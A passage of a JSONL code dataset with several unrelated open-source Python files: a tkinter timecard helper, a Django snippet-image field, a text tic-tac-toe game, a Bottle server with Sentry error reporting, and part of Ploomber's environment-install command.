th.convert_helper(sum, 2).split(\":\")\n sum_hours, sum_minutes = int(sum_format[0]), int(sum_format[1])\n fri_time = th.difference_helper(fri_start, \"15:00\") - datetime.timedelta(minutes=30)\n tot = datetime.timedelta(hours=sum_hours, minutes=sum_minutes) + fri_time\n left = datetime.timedelta(hours=40) - tot\n if int(checkin.split(\":\")[0]) < 11:\n left += datetime.timedelta(minutes=30)\n in_format = checkin.split(\":\")\n in_hours, in_minutes = int(in_format[0]), int(in_format[1])\n checkout = datetime.datetime(2022, 1, 1, in_hours, in_minutes) + left\n string = \"Check out today at {:d}:{:02d}\".format(checkout.hour, checkout.minute)\n msg = tk.Message(frame, text=string, width=300)\n msg.pack()\n\n textbox1 = tk.Entry(frame, textvariable=var1)\n textbox2 = tk.Entry(frame, textvariable=var2)\n textbox3 = tk.Entry(frame, textvariable=var3)\n ent = tk.Button(frame, text=\"Enter\", command=enter_click)\n\n txt1.pack()\n textbox1.pack()\n txt2.pack()\n textbox2.pack()\n txt3.pack()\n textbox3.pack()\n ent.pack()\n\n\ndef sf(frame):\n \"\"\"\n The scheduler screen for Friday.\n \"\"\"\n txt1 = tk.Message(frame, text=\"How many hours have you worked so far?\", width=300)\n txt2 = tk.Message(frame, text=\"What time did you check in? (HH:MM) \", width=300)\n txt3 = tk.Message(frame, text=\"What time do you want to check out today? (HH:MM) \", width=300)\n var1 = tk.StringVar()\n var2 = tk.StringVar()\n var3 = tk.StringVar()\n\n def enter_click():\n sum = float(var1.get())\n checkin = var2.get()\n checkout = var3.get()\n sum_format = th.convert_helper(sum, 2).split(\":\")\n sum_hours, sum_minutes = int(sum_format[0]), int(sum_format[1])\n today_hours = th.difference_helper(checkin, checkout)\n if int(checkin.split(\":\")[0]) < 11:\n # We have not eaten lunch yet, that will happen before our end time\n today_hours -= datetime.timedelta(minutes=30)\n tot = today_hours + datetime.timedelta(hours=sum_hours, minutes=sum_minutes)\n left = datetime.timedelta(hours=40) - tot + datetime.timedelta(minutes=30)\n fri_start = datetime.datetime(2022, 1, 1, 15, 0) - left\n string = \"Start on Friday at {:d}:{:02d}\".format(fri_start.hour, fri_start.minute)\n msg = tk.Message(frame, text=string)\n msg.pack()\n\n textbox1 = tk.Entry(frame, textvariable=var1)\n textbox2 = tk.Entry(frame, textvariable=var2)\n textbox3 = tk.Entry(frame, textvariable=var3)\n ent = tk.Button(frame, text=\"Enter\", command=enter_click)\n\n txt1.pack()\n textbox1.pack()\n txt2.pack()\n textbox2.pack()\n txt3.pack()\n textbox3.pack()\n ent.pack()\n\n\ndef time_difference(frame):\n \"\"\"\n The screen for finding the difference between two times.\n \"\"\"\n txt = tk.Message(frame, text=\"Find the difference between two times\", width=300)\n\n def enter_click():\n time1 = var1.get()\n time2 = var2.get()\n diff = th.difference_helper(time1, time2)\n string = \"The difference in these times is \" + str(diff)\n msg = tk.Message(frame, text=string, width=300)\n msg.pack()\n\n var1 = tk.StringVar()\n var2 = tk.StringVar()\n textbox1 = tk.Entry(frame, textvariable=var1)\n textbox2 = tk.Entry(frame, textvariable=var2)\n ent = tk.Button(frame, text=\"Enter\", command=enter_click)\n\n txt.pack(fill='x')\n textbox1.pack()\n textbox2.pack()\n ent.pack()\n\n\ndef make_menu(menu_frame):\n \"\"\"\n The menu screen.\n \"\"\"\n txt = tk.Message(menu_frame, text=\"Select an option:\", width=300, font=\"courier\")\n one = tk.Button(menu_frame, text=\"(1) How much time left? \", width=35, font=\"courier\", command=switch_time_left)\n two = tk.Button(menu_frame, text=\"(2) Scheduler \", width=35, font=\"courier\", command=switch_scheduler)\n thr = tk.Button(menu_frame, text=\"(3) Decimal to minute converter\", width=35, font=\"courier\", command=switch_convert)\n fou = tk.Button(menu_frame, text=\"(4) Time difference \", width=35, font=\"courier\", command=switch_time_difference)\n\n txt.pack(fill='x')\n one.pack(side=tk.TOP)\n two.pack(side=tk.TOP)\n thr.pack(side=tk.TOP)\n fou.pack(side=tk.TOP)\n\n\n# Set up the window\nwin = tk.Tk()\nwin.title(\"Timecard Helper\")\nwin.geometry(\"700x500\")\n\n# Create all the frames used throughout the application\nmenu_frame = tk.Frame(win)\ntime_left_frame = tk.Frame(win)\nconvert_frame = tk.Frame(win)\ntime_difference_frame = tk.Frame(win)\nscheduler_frame = tk.Frame(win)\nsr_frame = tk.Frame(win)\nsf_frame = tk.Frame(win)\n\n\nmenu_frame.pack(fill='x')\nmake_menu(menu_frame)\n\nwin.mainloop()\n\n","repo_name":"k-lea/timecard-helper","sub_path":"timecard_gui.py","file_name":"timecard_gui.py","file_ext":"py","file_size_in_byte":8101,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"11442454754","text":"from django.db.models import ImageField\nfrom uuid import uuid4\nfrom snippet_image import create_snippet_image\n\nfrom .attributes import Attributes\n\n\nclass BaseSnippetImageFieldMixin:\n method_prefix = 'get_snippet_image'\n snippet_type = 'default'\n kwargs = {}\n should_be_created_method = 'snippet_image_should_be_created'\n\n def extract_specific_kwargs(self, kwargs):\n return self.extract_kwargs(kwargs, Attributes)\n\n @staticmethod\n def extract_kwargs(kwargs, attributes):\n \"\"\"\n Extract filled attributes from kwargs.\n\n :param kwargs: The dictionary from which attributes will be extracted.\n :type kwargs: dict\n :param attributes: The enumerate of attributes that will be retrieved from the dictionary.\n :type attributes: Enum\n\n :return: extracted kwargs.\n :rtype: dict\n \"\"\"\n extracted_kwargs = {}\n for attribute in attributes:\n if kwargs.get(attribute.name):\n extracted_kwargs[attribute.name] = kwargs.pop(attribute.name)\n\n return extracted_kwargs\n\n def should_be_created(self, instance):\n method = getattr(instance, self.should_be_created_method, None)\n return method() if method else True\n\n @staticmethod\n def get_file_name():\n return '{}.jpeg'.format(str(uuid4()))\n\n def collect_data(self, instance):\n data = {\n attribute.name: self.get_attribute_value(instance, attribute) for attribute in Attributes\n }\n\n return data\n\n def get_attribute_value(self, instance, attribute):\n attribute_name = attribute.name\n value = self.get_attribute_from_kwargs(attribute_name)\n\n if not value:\n value = self.get_attribute_from_instance(instance, attribute_name)\n\n if not value:\n value = attribute.value.default\n\n self.validate_attribute(attribute, value)\n\n return value\n\n @staticmethod\n def validate_attribute(attribute, value):\n try:\n attribute.value.validate(value)\n except ValueError as error:\n raise ValueError('Validation error for attribute {}: {}'.format(attribute.name, str(error)))\n\n def get_attribute_from_kwargs(self, attribute_name):\n return self.kwargs.get(attribute_name)\n\n def get_attribute_from_instance(self, instance, attribute_name):\n method_name = '{}_{}'.format(self.method_prefix, attribute_name)\n method = getattr(instance, method_name, None)\n if method:\n value = method(self.snippet_type)\n else:\n value = None\n\n return value\n\n @staticmethod\n def create_snippet_image(data):\n return create_snippet_image(**data)\n\n def get_specific_deconstruct_kwargs(self):\n kwargs = {\n attribute.name: self.kwargs.get(attribute.name)\n for attribute in Attributes\n if not self.kwargs.get(attribute.name) is None\n }\n kwargs['snippet_type'] = self.snippet_type\n\n return kwargs\n\n\nclass SnippetImageField(BaseSnippetImageFieldMixin, ImageField):\n def __init__(\n self,\n snippet_type='default',\n **kwargs\n ):\n \"\"\"\n\n :param snippet_type (str): To collect different data for different fields.\n For example value: 'facebook', 'twitter' and etc.\n :param kwargs: snippet_image.create_snippet_image and ImageField params.\n If create_snippet_image parameter was not set in the constructor,\n it will be taken from the method get_snippet_image_{param} of instance or default settings.\n create_snippet_image:\n :param font: Path to font file. Is required. For load font used PIL.ImageFont.\n :type font: str\n :param size: Size of snippet image. tuple(width, height).\n :type size: tuple(int, int)\n :param text: Text of snippet image. By default is an empty string.\n :type text: str\n :param background: Path to background image file.\n :type background: str\n :param background_color: Background color of snippet image. Used when background is None.\n :type background_color: tuple(int, int, int)\n :param overlay: Path to overlay image. if size is None, overlay size is used.\n As an overlay, an image with a transparent background is used.\n :type overlay: str\n :param brightness: Brightness of background of snippet image. Value from 0 to 1.\n :type brightness: float\n :param font_color: Font color in RGBA. By default is (255, 255, 255, 255).\n :type font_color: tuple(int, int, int, int)\n :param font_size: Size of snippet image text. By default is 64.\n :type font_size: int\n :param padding: Text indents to the left and right of the snippet image.\n Value from 0 to 1.\n 0 - 0% width;\n 1 - 100% width.\n :type padding: float\n :param center : Background image center for crop and resize image. tuple(x, y).\n Defaults is center of background image.\n :type center: tuple(int, int)\n\n ImageField params:\n :param verbose_name:\n :param name:\n :param width_field:\n :param height_field:\n :param upload_to:\n :param storage:\n \"\"\"\n self.snippet_type = snippet_type\n self.kwargs = self.extract_specific_kwargs(kwargs)\n kwargs['blank'] = True\n super().__init__(**kwargs)\n\n def pre_save(self, instance, add):\n file = getattr(instance, self.attname)\n\n if (not file or not file.file) and self.should_be_created(instance):\n file_name = self.get_file_name()\n data = self.collect_data(instance)\n image = self.create_snippet_image(data)\n file.save(file_name, image, save=False)\n elif not file._committed:\n file.save(file.name, file.file, save=False)\n\n return file\n\n def deconstruct(self):\n name, path, args, kwargs = super().deconstruct()\n\n specific_attributes_values = self.get_specific_deconstruct_kwargs()\n kwargs.update(specific_attributes_values)\n\n return name, path, args, kwargs\n","repo_name":"acrius/django-snippet-image","sub_path":"django_snippet_image/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":6561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14383974992","text":"'''\n Text Based 2-Player Tic Tac Toe Game\n '''\n\nimport random\n\n''' Tic Tac Toe Game Structure '''\n# Step 1 -: Create a function that would list the instructions of the game\n# Step 2 -: Create a function that would display the board\n# Step 3 -: Create a function to allow players to choose between X and O\n# Step 4 -: Create a game environment that continues to play the game until there's a winner or all spaces are filled\n# Step 5 -: Create a function or logic flow with data validation that allows players to make moves on the board\n# Step 6 -: Create a function or conditional logic that checks win for X or O\n# Step 7 -: If there is a winner display the player who won the game\n# Step 8 -: Ask if the user wants to play game. If yes, repeat the game from the beginning, else, end the game.\n\ndef instructions():\n # A function that would list the instructions of the game\n\n print('Tic Tac Toe \\n')\n print('How to play: ')\n print('1.) Both players will choose whether to be \"X\" or \"O\" ')\n print('2.) To even the odds of winning, players will be randomly chosen to start ')\n print('3. On the board, players can choose the position with numbers from 1-9')\n print('3.) The first player to achieve a straight, horizontal, or vertical wins the game')\n print('4.) If players want to play again, press \"Y\" at the end of each game, or press \"N\" to end the game \\n')\n\n print('Each position on the board is based on a numerical position from 1-9 \\n')\n print(f' {1} | {2} | {3} ')\n print('---------------')\n print(f' {4} | {5} | {6} ')\n print('---------------')\n print(f' {7} | {8} | {9} ')\n print('')\n\ndef display_board(list):\n # A function that displays the board after each move\n\n print(list[0],' | ',list[1],' | ',list[2])\n print('---------------')\n print(list[3],' | ',list[4],' | ',list[5])\n print('---------------')\n print(list[6],' | ', list[7],' | ',list[8])\n print('')\n\ndef player_choice():\n # A function that allows players to choose between X and O with data validation\n\n while True:\n player1 = input('Please choose between \"X\" or \"O\": ').upper()\n print(\"\")\n\n if player1.upper() == \"X\" or player1.upper() == \"O\":\n print(f'Player 1 is {player1}')\n break\n\n else:\n print('Invalid entry. Please choose between \"X\" and \"O\" ')\n print(\"\")\n\n return player1\n\n\ndef check_winner(list):\n ''' Checks for winners for X and O '''\n\n # Diagonal Checks for X\n if list[0].upper() == 'X' and list[4].upper() == 'X' and list[8].upper() == 'X':\n return 'X has won'\n\n elif list[2].upper() == 'X' and list[4].upper() == 'X' and list[6].upper() == 'X':\n return 'X has won'\n\n # Vertical Checks for X\n\n elif list[0].upper() == 'X' and list[3].upper() == 'X' and list[6].upper() == 'X':\n return 'X has won'\n\n elif list[1].upper() == 'X' and list[4].upper() == 'X' and list[7].upper() == 'X':\n return 'X has won'\n\n\n elif list[2].upper() == 'X' and list[5].upper() == 'X' and list[8].upper() == 'X':\n return 'X has won'\n\n\n # Horizontal Checks for X\n\n elif list[0].upper() == 'X' and list[1].upper() == 'X' and list[2].upper() == 'X':\n return 'X has won'\n\n\n elif list[3].upper() == 'X' and list[4].upper() == 'X' and list[5].upper() == 'X':\n return 'X has won'\n\n elif list[6].upper() == 'X' and list[7].upper() == 'X' and list[8].upper() == 'X':\n return 'X has won'\n\n ''' Check for O wins '''\n\n # Diagonal Checks for O\n if list[0].upper() == 'O' and list[4].upper() == 'O' and list[8].upper() == 'O':\n return 'O has won'\n\n elif list[2].upper() == 'O' and list[4].upper() == 'O' and list[6].upper() == 'O':\n return 'O has won'\n\n\n # Vertical Checks for O\n\n elif list[0].upper() == 'O' and list[3].upper() == 'O' and list[6].upper() == 'O':\n return 'O has won'\n\n elif list[1].upper() == 'O' and list[4].upper() == 'O' and list[7].upper() == 'O':\n return 'O has won'\n\n elif list[2].upper() == 'O' and list[5].upper() == 'O' and list[8].upper() == 'O':\n return 'O has won'\n\n\n # Horizontal Checks for O\n\n elif list[0].upper() == 'O' and list[1].upper() == 'O' and list[2].upper() == 'O':\n return 'O has won'\n\n elif list[3].upper() == 'O' and list[4].upper() == 'O' and list[5].upper() == 'O':\n return 'O has won'\n\n elif list[6].upper() == 'O' and list[7].upper() == 'O' and list[8].upper() == 'O':\n return 'O has won'\n\n\ndef play_game():\n # A function with logic flow and data validation that allows players to make moves on the board\n\n moves_list = ['','','','','','','','','']\n move_range = [1,2,3,4,5,6,7,8,9]\n player1 = player_choice()\n\n if player1.upper() == 'X':\n player2 = 'O'\n print(f'Player 2 is {player2}\\n')\n\n elif player1.upper() == 'O':\n player2 = 'X'\n print(f'Player 2 is {player2}\\n')\n\n move_count = 0\n\n player_select = [player1,player2]\n random.shuffle(player_select)\n\n if player_select[0].upper() == player1:\n print(f'Player 1 ({player1}) to start\\n')\n\n elif player_select[0].upper() == player2:\n print(f'Player 2 ({player2}) to start\\n')\n\n display_board(moves_list)\n\n game_over = ''\n\n # Start the Game\n while move_count != 9:\n\n while True:\n # Player 1 / First Move\n player_move = input(f'({player_select[0]}) Please enter a position on the board (1-9): ')\n print('')\n\n if player_move.isdigit() == True:\n\n player_move = int(player_move)\n\n if player_move in move_range and moves_list[player_move - 1] == '':\n moves_list[player_move-1] = player_select[0]\n display_board(moves_list)\n move_count += 1\n game_over = check_winner(moves_list)\n break\n\n elif player_move in move_range and moves_list[player_move - 1] != '':\n # Stops players from choosing the same position\n print('This position is already taken. Please try again.\\n')\n continue\n\n else:\n print('Please choose a position between 1-9 \\n')\n continue\n\n else:\n print('That is an invalid entry. Please try again \\n')\n continue\n\n\n if str(game_over) == f'{player_select[0]} has won':\n print(game_over + '\\n')\n move_count = 9\n break\n\n elif game_over == f'{player_select[0]} has won' and move_count == 9:\n print(\"It's a draw \\n\")\n\n while move_count != 9:\n # Player 2 / Second Move\n game_over = str(check_winner(moves_list))\n\n\n player_move = input(f'({player_select[1]}) Please enter a position on the board (1-9): ')\n print('')\n\n if player_move.isdigit() == True:\n player_move = int(player_move)\n\n\n if player_move in move_range and moves_list[player_move - 1] == '':\n moves_list[player_move-1] = player_select[1]\n display_board(moves_list)\n move_count += 1\n game_over = check_winner(moves_list)\n break\n\n elif game_over == f'{player2} has won':\n move_count = 9\n break\n\n elif player_move in move_range and moves_list[player_move - 1] != '':\n # Stops players from choosing the same position\n print('This position is already taken. Please try again.\\n')\n continue\n\n else:\n print('Please choose a position between 1-9 \\n')\n continue\n\n else:\n print('That is an invalid entry. Please try again \\n')\n continue\n\n if str(game_over) == f'{player_select[1]} has won':\n print(game_over + '\\n')\n move_count = 9\n break\n\n elif game_over != f'{player_select[1]} has won' and move_count == 9:\n print(\"It's a draw \\n\")\n\n\n# Start the Official Game of Tic Tac Toe\n\ninstructions()\n\nstart_game = True\n\nwhile start_game:\n play_game()\n\n while True:\n reset_game = input('Press \"Y\" to play again or Press \"N\" to end the game: ')\n print('')\n\n if reset_game.upper() == 'Y':\n break\n\n elif reset_game.upper() == 'N':\n print('Thank you for playing!!!')\n start_game = False\n break\n\n else:\n print('Invalid Entry. Please try again \\n')\n\n","repo_name":"Nnamo23/My_Personal_Projects","sub_path":"Project 1: Text Based Tic Tac Toe/Tic-Tac-Toe.py","file_name":"Tic-Tac-Toe.py","file_ext":"py","file_size_in_byte":8719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39685187010","text":"import sentry_sdk\r\nimport os\r\nfrom bottle import Bottle, request, route, run\r\nfrom sentry_sdk.integrations.bottle import BottleIntegration\r\n\r\nsentry_sdk.init(\r\n dsn=\"https://07c92891bb8749ccbda5d4e34505f8cf@o399508.ingest.sentry.io/5256758\",\r\n integrations=[BottleIntegration()]\r\n)\r\n\r\n\r\n@route('/') \r\ndef index():\r\n html = \"\"\"\r\n\r\n\r\n \r\n info\r\n \r\n \r\n
        \r\n

        Это главная страничка.

        \r\n
        \r\n \r\n\r\n\"\"\"\r\n return html \r\n\r\n@route('/success') \r\ndef index():\r\n html = \"\"\"\r\n\r\n\r\n \r\n Страничка, где всё работает!!!\r\n \r\n \r\n
        \r\n

        Все работает!

        \r\n
        \r\n \r\n\r\n\"\"\"\r\n return html \r\n\r\n@route('/fail') \r\ndef index(): \r\n raise RuntimeError(\"There is an error!\") \r\n return \r\n \r\n \r\nif os.environ.get(\"APP_LOCATION\") == \"heroku\":\r\n run(\r\n host=\"0.0.0.0\",\r\n port=int(os.environ.get(\"PORT\", 5000)),\r\n server=\"gunicorn\",\r\n workers=3,\r\n )\r\nelse:\r\n run(host=\"localhost\", port=8080, debug=True)","repo_name":"daftgrey/skillfactory-D2","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18980364539","text":"\"\"\"\nImplementation of:\n\n$ plomber install\n\nThis command runs a bunch of pip/conda commands (depending on what's available)\nand it does the *right thing*: creating a new environment if needed, and\nlocking dependencies.\n\"\"\"\nimport sys\nimport json\nimport os\nimport shutil\nfrom pathlib import Path\nfrom contextlib import contextmanager\n\nimport click\nimport yaml\n\nfrom ploomber.io._commander import Commander\nfrom ploomber_core.exceptions import BaseException\nfrom ploomber.util.util import check_mixed_envs\nfrom ploomber.cli.io import command_endpoint\nfrom ploomber.util._sys import _python_bin\nfrom ploomber.telemetry import telemetry\n\n_SETUP_PY = \"setup.py\"\n\n_REQS_LOCK_TXT = \"requirements.lock.txt\"\n_REQS_TXT = \"requirements.txt\"\n\n_ENV_YML = \"environment.yml\"\n_ENV_LOCK_YML = \"environment.lock.yml\"\n\n_PYTHON_BIN_NAME = _python_bin()\n\n\n@command_endpoint\n@telemetry.log_call(\"install\")\ndef main(use_lock, create_env=None, use_venv=False):\n \"\"\"\n Install project, automatically detecting if it's a conda-based or pip-based\n project.\n\n Parameters\n ---------\n use_lock : bool\n If True Uses requirements.lock.txt/environment.lock.yml and\n requirements.dev.lock.txt/environment.dev.lock.yml files. If False\n uses regular files and creates the lock ones after installing\n dependencies. If None, it uses lock files if they exist, if they don't\n it uses regular files\n\n create_env : bool, default=None\n If True, creates a new environment, if False, it installs in the\n current environment. If None, it creates a new environment if there\n isn't one already active\n\n use_venv : bool, default=False\n Force to use Python's venv module, ignoring conda if installed\n \"\"\"\n USE_CONDA = shutil.which(\"conda\") and not use_venv\n ENV_YML_EXISTS = Path(_ENV_YML).exists()\n ENV_LOCK_YML_EXISTS = Path(_ENV_LOCK_YML).exists()\n REQS_TXT_EXISTS = Path(_REQS_TXT).exists()\n REQS_LOCK_TXT_EXISTS = Path(_REQS_LOCK_TXT).exists()\n\n if use_lock is None:\n if USE_CONDA:\n use_lock = ENV_LOCK_YML_EXISTS\n else:\n use_lock = REQS_LOCK_TXT_EXISTS\n\n if use_lock and not ENV_LOCK_YML_EXISTS and not REQS_LOCK_TXT_EXISTS:\n raise BaseException(\n \"Expected an environment.lock.yaml \"\n \"(conda) or requirements.lock.txt (pip) in the current \"\n \"directory. Add one of them and try again.\",\n type_=\"no_lock\",\n )\n elif not use_lock and not ENV_YML_EXISTS and not REQS_TXT_EXISTS:\n raise BaseException(\n \"Expected an environment.yaml (conda)\"\n \" or requirements.txt (pip) in the current directory.\"\n \" Add one of them and try again.\",\n type_=\"no_env_requirements\",\n )\n elif (\n not USE_CONDA and use_lock and ENV_LOCK_YML_EXISTS and not REQS_LOCK_TXT_EXISTS\n ):\n raise BaseException(\n \"Found env environment.lock.yaml \"\n \"but conda is not installed. Install conda or add a \"\n \"requirements.lock.txt to use pip instead\",\n type_=\"no_conda\",\n )\n elif not USE_CONDA and not use_lock and ENV_YML_EXISTS and not REQS_TXT_EXISTS:\n raise BaseException(\n \"Found environment.yaml but conda is not installed.\"\n \" Install conda or add a requirements.txt to use pip instead\",\n type_=\"no_conda2\",\n )\n elif USE_CONDA and use_lock and ENV_LOCK_YML_EXISTS:\n # TODO: emit warnings if unused requirements.txt?\n main_conda(\n use_lock=True,\n create_env=create_env\n if create_env is not None\n else _should_create_conda_env(),\n )\n elif USE_CONDA and not use_lock and ENV_YML_EXISTS:\n # TODO: emit warnings if unused requirements.txt?\n main_conda(\n use_lock=False,\n create_env=create_env\n if create_env is not None\n else _should_create_conda_env(),\n )\n else:\n # TODO: emit warnings if unused environment.yml?\n main_pip(\n use_lock=use_lock,\n create_env=create_env if create_env is not None else not _in_virtualenv(),\n )\n\n\ndef _get_base_prefix_compat():\n \"\"\"\n This function will find the pip virtualenv with different python versions.\n Get base/real prefix, or sys.prefix if there is none.\n \"\"\"\n return (\n getattr(sys, \"base_prefix\", None)\n or sys.prefix\n or getattr(sys, \"real_prefix\", None)\n )\n\n\ndef _in_virtualenv():\n return _get_base_prefix_compat() != sys.prefix\n\n\ndef main_pip(use_lock, create_env=True):\n \"\"\"\n Install pip-based project (uses venv), looks for requirements.txt files\n\n Parameters\n ----------\n start_time : datetime\n The initial runtime of the function.\n\n use_lock : bool\n If True Uses requirements.txt and requirements.dev.lock.txt files\n\n create_env : bool\n If True, it uses the venv module to create a new virtual environment,\n then installs the dependencies, otherwise it installs the dependencies\n in the current environment\n \"\"\"\n reqs_txt = _REQS_LOCK_TXT if use_lock else _REQS_TXT\n reqs_dev_txt = \"requirements.dev.lock.txt\" if use_lock else \"requirements.dev.txt\"\n\n cmdr = Commander()\n\n # TODO: modify readme to add how to activate env? probably also in conda\n name = Path(\".\").resolve().name\n\n try:\n _run_pip_commands(cmdr, create_env, name, reqs_dev_txt, reqs_txt, use_lock)\n except Exception as e:\n cmd = f\"pip install --requirement {reqs_txt}\"\n raise BaseException(\n \"Failed to setup your environment. \" f\"Invoke pip manually.\\n{cmd}\\n\\n\"\n ) from e\n\n\ndef _run_pip_commands(cmdr, create_env, name, reqs_dev_txt, reqs_txt, use_lock):\n if create_env:\n venv_dir = f\"venv-{name}\"\n cmdr.print(\"Creating venv...\")\n cmdr.run(_PYTHON_BIN_NAME, \"-m\", \"venv\", venv_dir, description=\"Creating venv\")\n\n # add venv_dir to .gitignore if it doesn't exist\n if Path(\".gitignore\").exists():\n with open(\".gitignore\") as f:\n if venv_dir not in f.read():\n cmdr.append_inline(venv_dir, \".gitignore\")\n else:\n cmdr.append_inline(venv_dir, \".gitignore\")\n\n folder, bin_name = _get_pip_folder_and_bin_name()\n pip = str(Path(venv_dir, folder, bin_name))\n\n if os.name == \"nt\":\n cmd_activate = f\"{venv_dir}\\\\Scripts\\\\Activate.ps1\"\n else:\n cmd_activate = f\"source {venv_dir}/bin/activate\"\n else:\n cmdr.print(\"Installing in current venv...\")\n pip = \"pip\"\n cmd_activate = None\n\n # FIXME: using an old version of pip may lead to broken environments, so\n # we need to ensure we upgrade before installing dependencies.\n\n if Path(_SETUP_PY).exists():\n _pip_install_setup_py_pip(cmdr, pip)\n\n _pip_install(cmdr, pip, lock=not use_lock, requirements=reqs_txt)\n\n if Path(reqs_dev_txt).exists():\n _pip_install(cmdr, pip, lock=not use_lock, requirements=reqs_dev_txt)\n\n _next_steps(cmdr, cmd_activate)\n\n\ndef main_conda(use_lock, create_env=True):\n \"\"\"\n Install conda-based project, looks for environment.yml files\n\n Parameters\n ----------\n use_lock : bool\n If True Uses environment.lock.yml and environment.dev.lock.yml files\n\n\n create_env : bool\n If True, it uses the venv module to create a new virtual environment,\n then installs the dependencies, otherwise it installs the dependencies\n in the current environment\n \"\"\"\n env_yml = _ENV_LOCK_YML if use_lock else _ENV_YML\n\n # TODO: ensure ploomber-scaffold includes dependency file (including\n # lock files in MANIFEST.in\n cmdr = Commander()\n\n # TODO: provide helpful error messages on each command\n\n if create_env:\n with open(env_yml) as f:\n env_name = yaml.safe_load(f)[\"name\"]\n\n current_env = _current_conda_env_name()\n\n if env_name == current_env:\n err = (\n f\"{env_yml} will create an environment \"\n f\"named {env_name!r}, which is the current active \"\n \"environment. Activate a different one and try \"\n \"again: conda activate base\"\n )\n telemetry.log_api(\n \"install-error\",\n metadata={\"type\": \"env_running_conflict\", \"exception\": err},\n )\n raise BaseException(err)\n else:\n env_name = _current_conda_env_name()\n\n # get current installed envs\n conda = shutil.which(\"conda\")\n mamba = shutil.which(\"mamba\")\n\n # if already installed and running on windows, ask to delete first,\n # otherwise it might lead to an intermittent error (permission denied\n # on vcruntime140.dll)\n if os.name == \"nt\" and create_env:\n envs = cmdr.run(conda, \"env\", \"list\", \"--json\", capture_output=True)\n already_installed = any(\n [\n env\n for env in json.loads(envs)[\"envs\"]\n # only check in the envs folder, ignore envs in other locations\n if \"envs\" in env and env_name in env\n ]\n )\n\n if already_installed:\n err = (\n f\"Environment {env_name!r} already exists, \"\n f\"delete it and try again \"\n f\"(conda env remove --name {env_name})\"\n )\n telemetry.log_api(\n \"install-error\", metadata={\"type\": \"duplicate_env\", \"exception\": err}\n )\n raise BaseException(err)\n\n pkg_manager = mamba if mamba else conda\n\n try:\n _run_conda_commands(\n cmdr, pkg_manager, create_env, env_yml, env_name, use_lock, conda\n )\n except Exception as e:\n if create_env:\n cmd = f\"conda env create --file {env_yml} --force\"\n else:\n cmd = f\"conda env update --file {env_yml} --name {env_name}\"\n raise BaseException(\n \"Failed to setup your environment. \" f\"Invoke conda manually.\\n{cmd}\\n\\n\"\n ) from e\n\n\ndef _run_conda_commands(\n cmdr,\n pkg_manager,\n create_env,\n env_yml,\n env_name,\n use_lock,\n conda,\n):\n if create_env:\n cmdr.print(\"Creating conda env...\")\n cmdr.run(\n pkg_manager,\n \"env\",\n \"create\",\n \"--file\",\n env_yml,\n \"--force\",\n description=\"Creating env\",\n )\n else:\n cmdr.print(\"Installing in current conda env...\")\n\n cmdr.run(\n pkg_manager,\n \"env\",\n \"update\",\n \"--file\",\n env_yml,\n \"--name\",\n env_name,\n description=\"Installing dependencies\",\n )\n\n if Path(_SETUP_PY).exists():\n _pip_install_setup_py_conda(cmdr, env_name)\n\n if not use_lock:\n env_lock = cmdr.run(\n conda,\n \"env\",\n \"export\",\n \"--no-build\",\n \"--name\",\n env_name,\n description=\"Locking dependencies\",\n capture_output=True,\n )\n Path(_ENV_LOCK_YML).write_text(env_lock)\n\n _try_conda_install_and_lock_dev(cmdr, pkg_manager, env_name, use_lock=use_lock)\n\n cmd_activate = f\"conda activate {env_name}\" if create_env else None\n _next_steps(cmdr, cmd_activate)\n\n\ndef _is_conda():\n \"\"\"\n The function will tell if the code is running in a conda env\n \"\"\"\n conda_path = Path(sys.prefix, \"conda-meta\")\n return (\n conda_path.exists()\n or os.environ.get(\"CONDA_PREFIX\", False)\n or os.environ.get(\"CONDA_DEFAULT_ENV\", False)\n )\n\n\ndef _should_create_conda_env():\n # not in conda env or running in base conda env\n is_conda = _is_conda()\n return not is_conda or (is_conda and _current_conda_env_name() == \"base\")\n\n\ndef _current_conda_env_name():\n return os.environ.get(\"CONDA_DEFAULT_ENV\") or Path(sys.executable).parents[1].name\n\n\ndef _get_pip_folder_and_bin_name():\n folder = \"Scripts\" if os.name == \"nt\" else \"bin\"\n bin_name = \"pip.exe\" if os.name == \"nt\" else \"pip\"\n return folder, bin_name\n\n\ndef _find_conda_root(conda_bin):\n conda_bin = Path(conda_bin)\n\n for parent in conda_bin.parents:\n # I've seen variations of this. on windows: Miniconda3 and miniconda3\n # on linux miniconda3, anaconda and miniconda\n if parent.name.lower() in {\"miniconda3\", \"miniconda\", \"anaconda3\"}:\n return parent\n err = (\n \"Failed to locate conda root from \"\n f\"directory: {str(conda_bin)!r}. Please submit an issue: \"\n \"https://github.com/ploomber/ploomber/issues/new\"\n )\n telemetry.log_api(\n \"install-error\", metadata={\"type\": \"no_conda_root\", \"exception\": err}\n )\n raise BaseException(err)\n\n\ndef _path_to_pip_in_env_with_name(conda_bin, env_name):\n conda_root = _find_conda_root(conda_bin)\n folder, bin_name = _get_pip_folder_and_bin_name()\n return str(conda_root / \"envs\" / env_name / folder / bin_name)\n\n\ndef _locate_pip_inside_conda(env_name):\n \"\"\"\n Locates pip inside the conda env with a given name\n \"\"\"\n pip = _path_to_pip_in_env_with_name(shutil.which(\"conda\"), env_name)\n\n # this might happen if the environment does not contain python/pip\n if not Path(pip).exists():\n err = (\n f\"Could not locate pip in environment {env_name!r}, make sure \"\n \"it is included in your environment.yml and try again\"\n )\n telemetry.log_api(\n \"install-error\", metadata={\"type\": \"no_pip_env\", \"exception\": err}\n )\n raise BaseException(err)\n\n return pip\n\n\ndef _pip_install_setup_py_conda(cmdr, env_name):\n \"\"\"\n Call \"pip install --editable .\" if setup.py exists. Automatically locates\n the appropriate pip binary inside the conda env given the env name\n \"\"\"\n pip = _locate_pip_inside_conda(env_name)\n _pip_install_setup_py_pip(cmdr, pip)\n\n\ndef _pip_install_setup_py_pip(cmdr, pip):\n cmdr.run(pip, \"install\", \"--editable\", \".\", description=\"Installing project\")\n\n\ndef _try_conda_install_and_lock_dev(cmdr, pkg_manager, env_name, use_lock):\n env_yml = \"environment.dev.lock.yml\" if 